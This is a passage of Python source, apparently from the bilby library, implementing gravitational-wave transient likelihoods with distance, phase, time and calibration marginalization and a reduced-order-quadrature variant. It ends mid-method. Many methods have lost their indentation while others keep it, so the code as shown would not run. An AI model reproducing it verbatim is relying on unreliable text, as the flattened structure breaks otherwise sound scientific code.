                         self.distance_prior_array)
        new_distance = Interped(
            self._distance_array, distance_post).sample()
        # Rescale the cached polarizations so later reconstructions (e.g. the
        # phase sample) are consistent with the drawn distance.
        self._rescale_signal(signal_polarizations, new_distance)
        return new_distance
def _calculate_inner_products(self, signal_polarizations):
d_inner_h = 0
h_inner_h = 0
for interferometer in self.interferometers:
per_detector_snr = self.calculate_snrs(
signal_polarizations, interferometer)
d_inner_h += per_detector_snr.d_inner_h
h_inner_h += per_detector_snr.optimal_snr_squared
return d_inner_h, h_inner_h
    def generate_phase_sample_from_marginalized_likelihood(
            self, signal_polarizations=None):
        r"""
        Generate a single sample from the posterior distribution for phase when
        using a likelihood which explicitly marginalises over phase.

        See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293

        Parameters
        ==========
        signal_polarizations: dict, optional
            Polarizations modes of the template.

        Returns
        =======
        new_phase: float
            Sample from the phase posterior.

        Notes
        =====
        This is only valid when the waveform depends on phase as
        mu(phi) \propto exp(-2i phi), i.e. the (2, 2)-mode-dominated case.
        """
        self.parameters.update(self.get_sky_frame_parameters())
        if signal_polarizations is None:
            signal_polarizations = \
                self.waveform_generator.frequency_domain_strain(self.parameters)
        d_inner_h, h_inner_h = self._calculate_inner_products(signal_polarizations)
        # Evaluate the phase likelihood on a uniform grid over [0, 2pi].
        phases = np.linspace(0, 2 * np.pi, 101)
        phasor = np.exp(-2j * phases)
        phase_log_post = d_inner_h * phasor - h_inner_h / 2
        phase_post = np.exp(phase_log_post.real - max(phase_log_post.real))
        new_phase = Interped(phases, phase_post).sample()
        return new_phase
def distance_marginalized_likelihood(self, d_inner_h, h_inner_h):
d_inner_h_ref, h_inner_h_ref = self._setup_rho(
d_inner_h, h_inner_h)
if self.phase_marginalization:
d_inner_h_ref = np.abs(d_inner_h_ref)
else:
d_inner_h_ref = np.real(d_inner_h_ref)
return self._interp_dist_margd_loglikelihood(
d_inner_h_ref, h_inner_h_ref)
def phase_marginalized_likelihood(self, d_inner_h, h_inner_h):
d_inner_h = ln_i0(abs(d_inner_h))
if self.calibration_marginalization and self.time_marginalization:
return d_inner_h - np.outer(h_inner_h, np.ones(np.shape(d_inner_h)[1])) / 2
else:
return d_inner_h - h_inner_h / 2
def time_marginalized_likelihood(self, d_inner_h_tc_array, h_inner_h):
if self.distance_marginalization:
log_l_tc_array = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h_tc_array, h_inner_h=h_inner_h)
elif self.phase_marginalization:
log_l_tc_array = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h_tc_array,
h_inner_h=h_inner_h)
else:
log_l_tc_array = np.real(d_inner_h_tc_array) - h_inner_h / 2
times = self._times
if self.jitter_time:
times = self._times + self.parameters['time_jitter']
time_prior_array = self.priors['geocent_time'].prob(times) * self._delta_tc
return logsumexp(log_l_tc_array, b=time_prior_array)
def time_and_calibration_marginalized_likelihood(self, d_inner_h_array, h_inner_h):
times = self._times
if self.jitter_time:
times = self._times + self.parameters['time_jitter']
_time_prior = self.priors['geocent_time']
time_mask = np.logical_and((times >= _time_prior.minimum), (times <= _time_prior.maximum))
times = times[time_mask]
time_probs = self.priors['geocent_time'].prob(times) * self._delta_tc
d_inner_h_array = d_inner_h_array[:, time_mask]
h_inner_h = h_inner_h
if self.distance_marginalization:
log_l_array = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h_array, h_inner_h=h_inner_h)
elif self.phase_marginalization:
log_l_array = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h_array,
h_inner_h=h_inner_h)
else:
log_l_array = np.real(d_inner_h_array) - np.outer(h_inner_h, np.ones(np.shape(d_inner_h_array)[1])) / 2
prior_array = np.outer(time_probs, 1. / self.number_of_response_curves * np.ones(len(h_inner_h))).T
return logsumexp(log_l_array, b=prior_array)
    def get_calibration_log_likelihoods(self, signal_polarizations=None):
        """Per-draw log likelihoods over the calibration response curves.

        Parameters
        ==========
        signal_polarizations: dict, optional
            Polarizations modes of the template; generated if not given.

        Returns
        =======
        array_like: log likelihood for each of the
            number_of_response_curves calibration draws.
        """
        self.parameters.update(self.get_sky_frame_parameters())
        if signal_polarizations is None:
            signal_polarizations =\
                self.waveform_generator.frequency_domain_strain(self.parameters)
        d_inner_h = 0.
        optimal_snr_squared = 0.
        complex_matched_filter_snr = 0.
        d_inner_h_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
        optimal_snr_squared_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
        # Accumulate the per-curve inner products over detectors.
        for interferometer in self.interferometers:
            per_detector_snr = self.calculate_snrs(
                waveform_polarizations=signal_polarizations,
                interferometer=interferometer)
            d_inner_h += per_detector_snr.d_inner_h
            optimal_snr_squared += np.real(per_detector_snr.optimal_snr_squared)
            complex_matched_filter_snr += per_detector_snr.complex_matched_filter_snr
            d_inner_h_array += per_detector_snr.d_inner_h_array
            optimal_snr_squared_array += per_detector_snr.optimal_snr_squared_array
        if self.distance_marginalization:
            log_l_cal_array = self.distance_marginalized_likelihood(
                d_inner_h=d_inner_h_array, h_inner_h=optimal_snr_squared_array)
        elif self.phase_marginalization:
            log_l_cal_array = self.phase_marginalized_likelihood(
                d_inner_h=d_inner_h_array,
                h_inner_h=optimal_snr_squared_array)
        else:
            log_l_cal_array = np.real(d_inner_h_array - optimal_snr_squared_array / 2)
        return log_l_cal_array
def calibration_marginalized_likelihood(self, d_inner_h_calibration_array, h_inner_h):
if self.distance_marginalization:
log_l_cal_array = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h_calibration_array, h_inner_h=h_inner_h)
elif self.phase_marginalization:
log_l_cal_array = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h_calibration_array,
h_inner_h=h_inner_h)
else:
log_l_cal_array = np.real(d_inner_h_calibration_array - h_inner_h / 2)
return logsumexp(log_l_cal_array) - np.log(self.number_of_response_curves)
def _setup_rho(self, d_inner_h, optimal_snr_squared):
optimal_snr_squared_ref = (optimal_snr_squared.real *
self.parameters['luminosity_distance'] ** 2 /
self._ref_dist ** 2.)
d_inner_h_ref = (d_inner_h * self.parameters['luminosity_distance'] /
self._ref_dist)
return d_inner_h_ref, optimal_snr_squared_ref
def log_likelihood(self):
return self.log_likelihood_ratio() + self.noise_log_likelihood()
    @property
    def _delta_distance(self):
        """Spacing of the (linspace, hence uniform) distance grid."""
        return self._distance_array[1] - self._distance_array[0]
    @property
    def _dist_multiplier(self):
        ''' Maximum value of ref_dist/dist_array '''
        # distance_array[0] is the grid minimum, so this ratio is maximal.
        return self._ref_dist / self._distance_array[0]
    @property
    def _optimal_snr_squared_ref_array(self):
        """ Optimal filter snr at fiducial distance of ref_dist Mpc """
        # Log-spaced grid matching the first axis of the lookup table.
        return np.logspace(-5, 10, self._dist_margd_loglikelihood_array.shape[0])
    @property
    def _d_inner_h_ref_array(self):
        """ Matched filter snr at fiducial distance of ref_dist Mpc """
        if self.phase_marginalization:
            # With phase marginalized only |<d, h>| enters, so the grid is
            # positive-only.
            return np.logspace(-5, 10, self._dist_margd_loglikelihood_array.shape[1])
        else:
            # Without phase marginalization Re<d, h> may be negative: split
            # the grid into a negative and a positive log-spaced branch.
            n_negative = self._dist_margd_loglikelihood_array.shape[1] // 2
            n_positive = self._dist_margd_loglikelihood_array.shape[1] - n_negative
            return np.hstack((
                -np.logspace(3, -3, n_negative), np.logspace(-3, 10, n_positive)
            ))
def _setup_distance_marginalization(self, lookup_table=None):
if isinstance(lookup_table, str) or lookup_table is None:
self.cached_lookup_table_filename = lookup_table
lookup_table = self.load_lookup_table(
self.cached_lookup_table_filename)
if isinstance(lookup_table, dict):
if self._test_cached_lookup_table(lookup_table):
self._dist_margd_loglikelihood_array = lookup_table[
'lookup_table']
else:
self._create_lookup_table()
else:
self._create_lookup_table()
self._interp_dist_margd_loglikelihood = UnsortedInterp2d(
self._d_inner_h_ref_array, self._optimal_snr_squared_ref_array,
self._dist_margd_loglikelihood_array, kind='cubic', fill_value=-np.inf)
@property
def cached_lookup_table_filename(self):
if self._lookup_table_filename is None:
self._lookup_table_filename = (
'.distance_marginalization_lookup.npz')
return self._lookup_table_filename
@cached_lookup_table_filename.setter
def cached_lookup_table_filename(self, filename):
if isinstance(filename, str):
if filename[-4:] != '.npz':
filename += '.npz'
self._lookup_table_filename = filename
    def load_lookup_table(self, filename):
        """Load a cached distance-marginalization lookup table from disk.

        Parameters
        ==========
        filename: str
            Path to the .npz cache file.

        Returns
        =======
        dict or None: the loaded arrays if the file exists and matches the
            current configuration; otherwise None (falling through the
            non-matching branch also returns None implicitly).
        """
        if os.path.exists(filename):
            try:
                loaded_file = dict(np.load(filename))
            except AttributeError as e:
                # Incompatible/corrupt cache: warn and rebuild from scratch.
                logger.warning(e)
                self._create_lookup_table()
                return None
            match, failure = self._test_cached_lookup_table(loaded_file)
            if match:
                logger.info('Loaded distance marginalisation lookup table from '
                            '{}.'.format(filename))
                return loaded_file
            else:
                logger.info('Loaded distance marginalisation lookup table does '
                            'not match for {}.'.format(failure))
        elif isinstance(filename, str):
            logger.info('Distance marginalisation file {} does not '
                        'exist'.format(filename))
        return None
def cache_lookup_table(self):
np.savez(self.cached_lookup_table_filename,
distance_array=self._distance_array,
prior_array=self.distance_prior_array,
lookup_table=self._dist_margd_loglikelihood_array,
reference_distance=self._ref_dist,
phase_marginalization=self.phase_marginalization)
def _test_cached_lookup_table(self, loaded_file):
pairs = dict(
distance_array=self._distance_array,
prior_array=self.distance_prior_array,
reference_distance=self._ref_dist,
phase_marginalization=self.phase_marginalization)
for key in pairs:
if key not in loaded_file:
return False, key
elif not np.array_equal(np.atleast_1d(loaded_file[key]),
np.atleast_1d(pairs[key])):
return False, key
return True, None
    def _create_lookup_table(self):
        """ Make the lookup table """
        from tqdm.auto import tqdm
        logger.info('Building lookup table for distance marginalisation.')
        # Table axes: rows index the <h, h> grid, columns the <d, h> grid.
        self._dist_margd_loglikelihood_array = np.zeros((400, 800))
        # Factor mapping each grid distance back to the reference distance.
        scaling = self._ref_dist / self._distance_array
        d_inner_h_array_full = np.outer(self._d_inner_h_ref_array, scaling)
        h_inner_h_array_full = np.outer(self._optimal_snr_squared_ref_array, scaling ** 2)
        if self.phase_marginalization:
            d_inner_h_array_full = ln_i0(abs(d_inner_h_array_full))
        prior_term = self.distance_prior_array * self._delta_distance
        for ii, optimal_snr_squared_array in tqdm(
            enumerate(h_inner_h_array_full), total=len(self._optimal_snr_squared_ref_array)
        ):
            for jj, d_inner_h_array in enumerate(d_inner_h_array_full):
                # Marginalize over distance with the prior as weights.
                self._dist_margd_loglikelihood_array[ii][jj] = logsumexp(
                    d_inner_h_array - optimal_snr_squared_array / 2,
                    b=prior_term
                )
        # Normalization: the same weighted sum with zero log likelihood.
        log_norm = logsumexp(
            0 / self._distance_array, b=self.distance_prior_array * self._delta_distance
        )
        self._dist_margd_loglikelihood_array -= log_norm
        self.cache_lookup_table()
    def _setup_phase_marginalization(self, min_bound=-5, max_bound=10):
        """Deprecated no-op kept for backward compatibility.

        The bound arguments are unused; phase marginalization now uses
        bilby.gw.utils.ln_i0 directly.
        """
        logger.warning(
            "The _setup_phase_marginalization method is deprecated and will be removed, "
            "please update the implementation of phase marginalization "
            "to use bilby.gw.utils.ln_i0"
        )
    @staticmethod
    def _bessel_function_interped(xx):
        """Deprecated wrapper around ln_i0.

        NOTE(review): the "+ xx" offset suggests ln_i0 returns
        log(I0(xx)) - xx (a scaled Bessel form); confirm against
        bilby.gw.utils.ln_i0.
        """
        logger.warning(
            "The _bessel_function_interped method is deprecated and will be removed, "
            "please update the implementation of phase marginalization "
            "to use bilby.gw.utils.ln_i0"
        )
        return ln_i0(xx) + xx
    def _setup_time_marginalization(self):
        """Build the discrete time grid and prior weights for time marginalization."""
        # Grid spacing of 2 / f_s; NOTE(review): the factor 2 presumably
        # matches the FFT length used in calculate_snrs (one-sided frequency
        # series) — confirm against that method.
        self._delta_tc = 2 / self.waveform_generator.sampling_frequency
        # Times span the analysis segment; the first sample is dropped so the
        # grid has duration/2 * f_s points.
        self._times =\
            self.interferometers.start_time + np.linspace(
                0, self.interferometers.duration,
                int(self.interferometers.duration / 2 *
                    self.waveform_generator.sampling_frequency + 1))[1:]
        self.time_prior_array = \
            self.priors['geocent_time'].prob(self._times) * self._delta_tc
    def _setup_calibration_marginalization(self, calibration_lookup_table):
        """Draw or load the calibration response curves for each detector.

        Side effects: populates self.calibration_draws /
        self.calibration_abs_draws / self.calibration_parameter_draws, pins
        the per-detector recalib priors to delta functions, and replaces each
        detector's calibration model with an identity Recalibrate.

        Parameters
        ==========
        calibration_lookup_table: dict or None
            Mapping from detector name to a calibration file; missing entries
            default to '<name>_calibration_file.h5'.
        """
        if calibration_lookup_table is None:
            calibration_lookup_table = {}
        self.calibration_draws = {}
        self.calibration_abs_draws = {}
        self.calibration_parameter_draws = {}
        for interferometer in self.interferometers:
            # Force the priors: keep a copy of this detector's recalib priors
            # for sampling, then fix them so the sampler no longer varies them.
            calibration_priors = PriorDict()
            for key in self.priors.keys():
                if 'recalib' in key and interferometer.name in key:
                    calibration_priors[key] = copy.copy(self.priors[key])
                    self.priors[key] = DeltaFunction(0.0)
            # If there is no entry in the lookup table, make an empty one
            if interferometer.name not in calibration_lookup_table.keys():
                calibration_lookup_table[interferometer.name] =\
                    f'{interferometer.name}_calibration_file.h5'
            # If the interferometer lookup table file exists, generate the curves from it
            if os.path.exists(calibration_lookup_table[interferometer.name]):
                self.calibration_draws[interferometer.name] =\
                    calibration.read_calibration_file(
                        calibration_lookup_table[interferometer.name], self.interferometers.frequency_array,
                        self.number_of_response_curves, self.starting_index)
            else:  # generate the fake curves
                from tqdm.auto import tqdm
                self.calibration_parameter_draws[interferometer.name] =\
                    pd.DataFrame(calibration_priors.sample(self.number_of_response_curves))
                self.calibration_draws[interferometer.name] = \
                    np.zeros((self.number_of_response_curves, len(interferometer.frequency_array)), dtype=complex)
                for i in tqdm(range(self.number_of_response_curves)):
                    self.calibration_draws[interferometer.name][i, :] =\
                        interferometer.calibration_model.get_calibration_factor(
                            interferometer.frequency_array,
                            prefix='recalib_{}_'.format(interferometer.name),
                            **self.calibration_parameter_draws[interferometer.name].iloc[i])
                # Persist the generated curves for reuse in later runs.
                calibration.write_calibration_file(
                    calibration_lookup_table[interferometer.name],
                    self.interferometers.frequency_array,
                    self.calibration_draws[interferometer.name],
                    self.calibration_parameter_draws[interferometer.name])
            # The draws now carry the calibration; reset the model to identity
            # so the response is not applied twice.
            interferometer.calibration_model = calibration.Recalibrate()
            _mask = interferometer.frequency_mask
            # Restrict draws to the analysis band and precompute |draw|^2.
            self.calibration_draws[interferometer.name] = self.calibration_draws[interferometer.name][:, _mask]
            self.calibration_abs_draws[interferometer.name] =\
                np.abs(self.calibration_draws[interferometer.name])**2
    @property
    def interferometers(self):
        """The detectors whose data enter the likelihood (InterferometerList)."""
        return self._interferometers

    @interferometers.setter
    def interferometers(self, interferometers):
        # Normalise any iterable of detectors/names to an InterferometerList.
        self._interferometers = InterferometerList(interferometers)
def _rescale_signal(self, signal, new_distance):
for mode in signal:
signal[mode] *= self._ref_dist / new_distance
    @property
    def reference_frame(self):
        """The frame sky position is sampled in: "sky" or a detector pair."""
        return self._reference_frame
@property
def _reference_frame_str(self):
if isinstance(self.reference_frame, str):
return self.reference_frame
else:
return "".join([ifo.name for ifo in self.reference_frame])
    @reference_frame.setter
    def reference_frame(self, frame):
        # Accepted forms: the literal "sky", an InterferometerList, a list of
        # detectors/names, or a string of two concatenated two-character
        # detector names (e.g. "H1L1"). Only the first two detectors are kept.
        if frame == "sky":
            self._reference_frame = frame
        elif isinstance(frame, InterferometerList):
            self._reference_frame = frame[:2]
        elif isinstance(frame, list):
            self._reference_frame = InterferometerList(frame[:2])
        elif isinstance(frame, str):
            # e.g. "H1L1" -> ["H1", "L1"]
            self._reference_frame = InterferometerList([frame[:2], frame[2:4]])
        else:
            raise ValueError("Unable to parse reference frame {}".format(frame))
def get_sky_frame_parameters(self):
time = self.parameters['{}_time'.format(self.time_reference)]
if not self.reference_frame == "sky":
ra, dec = zenith_azimuth_to_ra_dec(
self.parameters['zenith'], self.parameters['azimuth'],
time, self.reference_frame)
else:
ra = self.parameters["ra"]
dec = self.parameters["dec"]
if "geocent" not in self.time_reference:
geocent_time = (
time - self.reference_ifo.time_delay_from_geocenter(
ra=ra, dec=dec, time=time
)
)
else:
geocent_time = self.parameters["geocent_time"]
return dict(ra=ra, dec=dec, geocent_time=geocent_time)
    @property
    def lal_version(self):
        """str: LAL version and git-version string, or "N/A" if unavailable."""
        try:
            from lal import git_version, __version__
            lal_version = str(__version__)
            logger.info("Using lal version {}".format(lal_version))
            # Flatten the multi-line git message into one line for metadata.
            lal_git_version = str(git_version.verbose_msg).replace("\n", ";")
            logger.info("Using lal git version {}".format(lal_git_version))
            return "lal_version={}, lal_git_version={}".format(lal_version, lal_git_version)
        except (ImportError, AttributeError):
            return "N/A"
    @property
    def lalsimulation_version(self):
        """str: lalsimulation version and git-version string, or "N/A"."""
        try:
            from lalsimulation import git_version, __version__
            lalsim_version = str(__version__)
            logger.info("Using lalsimulation version {}".format(lalsim_version))
            # Flatten the multi-line git message into one line for metadata.
            lalsim_git_version = str(git_version.verbose_msg).replace("\n", ";")
            logger.info("Using lalsimulation git version {}".format(lalsim_git_version))
            return "lalsimulation_version={}, lalsimulation_git_version={}".format(lalsim_version, lalsim_git_version)
        except (ImportError, AttributeError):
            return "N/A"
    @property
    def meta_data(self):
        """dict: summary of the likelihood configuration for result metadata."""
        return dict(
            interferometers=self.interferometers.meta_data,
            time_marginalization=self.time_marginalization,
            phase_marginalization=self.phase_marginalization,
            distance_marginalization=self.distance_marginalization,
            calibration_marginalization=self.calibration_marginalization,
            waveform_generator_class=self.waveform_generator.__class__,
            waveform_arguments=self.waveform_generator.waveform_arguments,
            frequency_domain_source_model=self.waveform_generator.frequency_domain_source_model,
            parameter_conversion=self.waveform_generator.parameter_conversion,
            sampling_frequency=self.waveform_generator.sampling_frequency,
            duration=self.waveform_generator.duration,
            start_time=self.waveform_generator.start_time,
            time_reference=self.time_reference,
            reference_frame=self._reference_frame_str,
            lal_version=self.lal_version,
            lalsimulation_version=self.lalsimulation_version)
class BasicGravitationalWaveTransient(Likelihood):
    """The simplest frequency-domain gravitational wave transient likelihood.

    Does not include distance/phase marginalization.
    """
    def __init__(self, interferometers, waveform_generator):
        """
        A likelihood object, able to compute the likelihood of the data given
        some model parameters.

        Parameters
        ==========
        interferometers: list
            A list of `bilby.gw.detector.Interferometer` instances - contains the
            detector data and power spectral densities
        waveform_generator: bilby.gw.waveform_generator.WaveformGenerator
            An object which computes the frequency-domain strain of the signal,
            given some set of parameters
        """
        super(BasicGravitationalWaveTransient, self).__init__(dict())
        self.interferometers = interferometers
        self.waveform_generator = waveform_generator
    def __repr__(self):
        template = '(interferometers={},\n\twaveform_generator={})'
        return self.__class__.__name__ + template.format(
            self.interferometers, self.waveform_generator)
    def noise_log_likelihood(self):
        """ Calculates the real part of noise log-likelihood

        Returns
        =======
        float: The real part of the noise log likelihood
        """
        log_l = 0
        # Whitened power of the data alone, summed over detectors.
        for ifo in self.interferometers:
            log_l -= 2. / self.waveform_generator.duration * np.sum(
                np.abs(ifo.frequency_domain_strain) ** 2 /
                ifo.power_spectral_density_array)
        return log_l.real
    def log_likelihood(self):
        """ Calculates the real part of log-likelihood value

        Returns
        =======
        float: The real part of the log likelihood
        """
        polarizations = self.waveform_generator.frequency_domain_strain(
            self.parameters.copy())
        # A generator may return None for unphysical parameters.
        if polarizations is None:
            return np.nan_to_num(-np.inf)
        log_l = sum(
            self.log_likelihood_interferometer(polarizations, ifo)
            for ifo in self.interferometers)
        return log_l.real
    def log_likelihood_interferometer(self, waveform_polarizations,
                                      interferometer):
        """Single-detector contribution to the log-likelihood.

        Parameters
        ==========
        waveform_polarizations: dict
            Dictionary containing the desired waveform polarization modes and the related strain
        interferometer: bilby.gw.detector.Interferometer
            The Interferometer object we want to have the log-likelihood for

        Returns
        =======
        float: The real part of the log-likelihood for this interferometer
        """
        signal = interferometer.get_detector_response(
            waveform_polarizations, self.parameters)
        residual = interferometer.frequency_domain_strain - signal
        # Whitened inner product of the residual with itself.
        log_l = - 2. / self.waveform_generator.duration * np.vdot(
            residual, residual / interferometer.power_spectral_density_array)
        return log_l.real
class ROQGravitationalWaveTransient(GravitationalWaveTransient):
    """A reduced order quadrature likelihood object

    This uses the method described in Smith et al., (2016) Phys. Rev. D 94,
    044031. A public repository of the ROQ data is available from
    https://git.ligo.org/lscsoft/ROQ_data.

    Parameters
    ==========
    interferometers: list, bilby.gw.detector.InterferometerList
        A list of `bilby.detector.Interferometer` instances - contains the
        detector data and power spectral densities
    waveform_generator: `bilby.waveform_generator.WaveformGenerator`
        An object which computes the frequency-domain strain of the signal,
        given some set of parameters
    linear_matrix: str, array_like
        Either a string pointing to the file from which to load the
        linear_matrix array, or the array itself.
    quadratic_matrix: str, array_like
        Either a string pointing to the file from which to load the
        quadratic_matrix array, or the array itself.
    roq_params: str, array_like
        Parameters describing the domain of validity of the ROQ basis.
    roq_params_check: bool
        If true, run tests using the roq_params to check the prior and data are
        valid for the ROQ
    roq_scale_factor: float
        The ROQ scale factor used.
    priors: dict, bilby.prior.PriorDict
        A dictionary of priors containing at least the geocent_time prior
        Warning: when using marginalisation the dict is overwritten which will
        change the dict you are passing in. If this behaviour is undesired,
        pass `priors.copy()`.
    distance_marginalization_lookup_table: (dict, str), optional
        If a dict, dictionary containing the lookup_table, distance_array,
        (distance) prior_array, and reference_distance used to construct
        the table.
        If a string the name of a file containing these quantities.
        The lookup table is stored after construction in either the
        provided string or a default location:
        '.distance_marginalization_lookup_dmin{}_dmax{}_n{}.npz'
    reference_frame: (str, bilby.gw.detector.InterferometerList, list), optional
        Definition of the reference frame for the sky location.
        - "sky": sample in RA/dec, this is the default
        - e.g., "H1L1", ["H1", "L1"], InterferometerList(["H1", "L1"]):
          sample in azimuth and zenith, `azimuth` and `zenith` defined in the
          frame where the z-axis is aligned with the vector connecting H1
          and L1.
    time_reference: str, optional
        Name of the reference for the sampled time parameter.
        - "geocent"/"geocenter": sample in the time at the Earth's center,
          this is the default
        - e.g., "H1": sample in the time of arrival at H1
    """
    def __init__(
            self, interferometers, waveform_generator, priors,
            weights=None, linear_matrix=None, quadratic_matrix=None,
            roq_params=None, roq_params_check=True, roq_scale_factor=1,
            distance_marginalization=False, phase_marginalization=False,
            distance_marginalization_lookup_table=None,
            reference_frame="sky", time_reference="geocenter"
    ):
        # Time marginalization and time jitter are disabled: ROQ handles the
        # arrival time via the precomputed time-sample grid instead.
        super(ROQGravitationalWaveTransient, self).__init__(
            interferometers=interferometers,
            waveform_generator=waveform_generator, priors=priors,
            distance_marginalization=distance_marginalization,
            phase_marginalization=phase_marginalization,
            time_marginalization=False,
            distance_marginalization_lookup_table=distance_marginalization_lookup_table,
            jitter_time=False,
            reference_frame=reference_frame,
            time_reference=time_reference
        )
        self.roq_params_check = roq_params_check
        self.roq_scale_factor = roq_scale_factor
        # roq_params may be given directly as a structured array or as a path
        # to a text file with named columns (flow, fhigh, seglen, ...).
        if isinstance(roq_params, np.ndarray) or roq_params is None:
            self.roq_params = roq_params
        elif isinstance(roq_params, str):
            self.roq_params_file = roq_params
            self.roq_params = np.genfromtxt(roq_params, names=True)
        else:
            raise TypeError("roq_params should be array or str")
        # Weights may be supplied precomputed (dict or file); otherwise start
        # from an empty dict to be filled by _set_weights below.
        if isinstance(weights, dict):
            self.weights = weights
        elif isinstance(weights, str):
            self.weights = self.load_weights(weights)
        else:
            self.weights = dict()
        if isinstance(linear_matrix, str):
            logger.info(
                "Loading linear matrix from {}".format(linear_matrix))
            linear_matrix = np.load(linear_matrix).T
        if isinstance(quadratic_matrix, str):
            logger.info(
                "Loading quadratic_matrix from {}".format(quadratic_matrix))
            quadratic_matrix = np.load(quadratic_matrix).T
        # NOTE(review): the weights are (re)computed here even when a
        # precomputed weights dict/file was supplied above, and this call
        # requires the basis matrices — confirm this is intended.
        self._set_weights(linear_matrix=linear_matrix,
                          quadratic_matrix=quadratic_matrix)
        self.frequency_nodes_linear =\
            waveform_generator.waveform_arguments['frequency_nodes_linear']
        self.frequency_nodes_quadratic = \
            waveform_generator.waveform_arguments['frequency_nodes_quadratic']
    def calculate_snrs(self, waveform_polarizations, interferometer):
        """
        Compute the snrs for ROQ

        Parameters
        ==========
        waveform_polarizations: waveform
        interferometer: bilby.gw.detector.Interferometer
        """
        # Project the plus/cross ROQ components onto the detector.
        f_plus = interferometer.antenna_response(
            self.parameters['ra'], self.parameters['dec'],
            self.parameters['geocent_time'], self.parameters['psi'], 'plus')
        f_cross = interferometer.antenna_response(
            self.parameters['ra'], self.parameters['dec'],
            self.parameters['geocent_time'], self.parameters['psi'], 'cross')
        dt = interferometer.time_delay_from_geocenter(
            self.parameters['ra'], self.parameters['dec'],
            self.parameters['geocent_time'])
        # Arrival time at this detector measured from the data start time.
        dt_geocent = self.parameters['geocent_time'] - interferometer.strain_data.start_time
        ifo_time = dt_geocent + dt
        # Calibration factors evaluated at the linear/quadratic ROQ nodes.
        calib_linear = interferometer.calibration_model.get_calibration_factor(
            self.frequency_nodes_linear,
            prefix='recalib_{}_'.format(interferometer.name), **self.parameters)
        calib_quadratic = interferometer.calibration_model.get_calibration_factor(
            self.frequency_nodes_quadratic,
            prefix='recalib_{}_'.format(interferometer.name), **self.parameters)
        h_plus_linear = f_plus * waveform_polarizations['linear']['plus'] * calib_linear
        h_cross_linear = f_cross * waveform_polarizations['linear']['cross'] * calib_linear
        h_plus_quadratic = (
            f_plus * waveform_polarizations['quadratic']['plus'] * calib_quadratic)
        h_cross_quadratic = (
            f_cross * waveform_polarizations['quadratic']['cross'] * calib_quadratic)
        # Five time samples around the arrival time are needed for the
        # interpolation in _interp_five_samples.
        indices, in_bounds = self._closest_time_indices(
            ifo_time, self.weights['time_samples'])
        if not in_bounds:
            logger.debug("SNR calculation error: requested time at edge of ROQ time samples")
            # Return -inf-like d_inner_h so this sample is rejected.
            return self._CalculatedSNRs(
                d_inner_h=np.nan_to_num(-np.inf), optimal_snr_squared=0,
                complex_matched_filter_snr=np.nan_to_num(-np.inf),
                d_inner_h_squared_tc_array=None,
                d_inner_h_array=None,
                optimal_snr_squared_array=None)
        # <d|h> at each of the five time samples via the linear weights.
        d_inner_h_tc_array = np.einsum(
            'i,ji->j', np.conjugate(h_plus_linear + h_cross_linear),
            self.weights[interferometer.name + '_linear'][indices])
        d_inner_h = self._interp_five_samples(
            self.weights['time_samples'][indices], d_inner_h_tc_array, ifo_time)
        # <h|h> is time-independent; use the quadratic weights directly.
        optimal_snr_squared = \
            np.vdot(np.abs(h_plus_quadratic + h_cross_quadratic)**2,
                    self.weights[interferometer.name + '_quadratic'])
        with np.errstate(invalid="ignore"):
            complex_matched_filter_snr = d_inner_h / (optimal_snr_squared**0.5)
        d_inner_h_squared_tc_array = None
        return self._CalculatedSNRs(
            d_inner_h=d_inner_h, optimal_snr_squared=optimal_snr_squared,
            complex_matched_filter_snr=complex_matched_filter_snr,
            d_inner_h_squared_tc_array=d_inner_h_squared_tc_array,
            d_inner_h_array=None,
            optimal_snr_squared_array=None)
    @staticmethod
    def _closest_time_indices(time, samples):
        """
        Get the closest five times

        Parameters
        ==========
        time: float
            Time to check
        samples: array-like
            Available times (assumed uniformly spaced)

        Returns
        =======
        indices: list
            Indices nearest to time
        in_bounds: bool
            Whether the indices are for valid times
        """
        # Nearest-from-below grid index, assuming uniform spacing.
        closest = int((time - samples[0]) / (samples[1] - samples[0]))
        indices = [closest + ii for ii in [-2, -1, 0, 1, 2]]
        in_bounds = (indices[0] >= 0) & (indices[-1] < samples.size)
        return indices, in_bounds
    @staticmethod
    def _interp_five_samples(time_samples, values, time):
        """
        Interpolate a function of time with its values at the closest five times.
        The algorithm is explained in https://dcc.ligo.org/T2100224.

        Parameters
        ==========
        time_samples: array-like
            Closest 5 times
        values: array-like
            The values of the function at closest 5 times
        time: float
            Time at which the function is calculated

        Returns
        =======
        value: float
            The value of the function at the input time
        """
        # Effective second derivatives at the two central samples.
        r1 = (-values[0] + 8. * values[1] - 14. * values[2] + 8. * values[3] - values[4]) / 4.
        r2 = values[2] - 2. * values[3] + values[4]
        # Cubic (spline-like) interpolation between samples 2 and 3.
        a = (time_samples[3] - time) / (time_samples[1] - time_samples[0])
        b = 1. - a
        c = (a**3. - a) / 6.
        d = (b**3. - b) / 6.
        return a * values[2] + b * values[3] + c * r1 + d * r2
    def perform_roq_params_check(self, ifo=None):
        """ Perform checking that the prior and data are valid for the ROQ

        Parameters
        ==========
        ifo: bilby.gw.detector.Interferometer
            The interferometer

        Raises
        ======
        BilbyROQParamsRangeError
            If the data or prior fall outside the ROQ basis validity range.
        """
        if self.roq_params_check is False:
            logger.warning("No ROQ params checking performed")
            return
        else:
            if getattr(self, "roq_params_file", None) is not None:
                msg = ("Check ROQ params {} with roq_scale_factor={}"
                       .format(self.roq_params_file, self.roq_scale_factor))
            else:
                msg = ("Check ROQ params with roq_scale_factor={}"
                       .format(self.roq_scale_factor))
            logger.info(msg)
        roq_params = self.roq_params
        # Frequencies scale up and durations/masses scale down with the
        # scale factor.
        roq_minimum_frequency = roq_params['flow'] * self.roq_scale_factor
        roq_maximum_frequency = roq_params['fhigh'] * self.roq_scale_factor
        roq_segment_length = roq_params['seglen'] / self.roq_scale_factor
        roq_minimum_chirp_mass = roq_params['chirpmassmin'] / self.roq_scale_factor
        roq_maximum_chirp_mass = roq_params['chirpmassmax'] / self.roq_scale_factor
        roq_minimum_component_mass = roq_params['compmin'] / self.roq_scale_factor
        if ifo.maximum_frequency > roq_maximum_frequency:
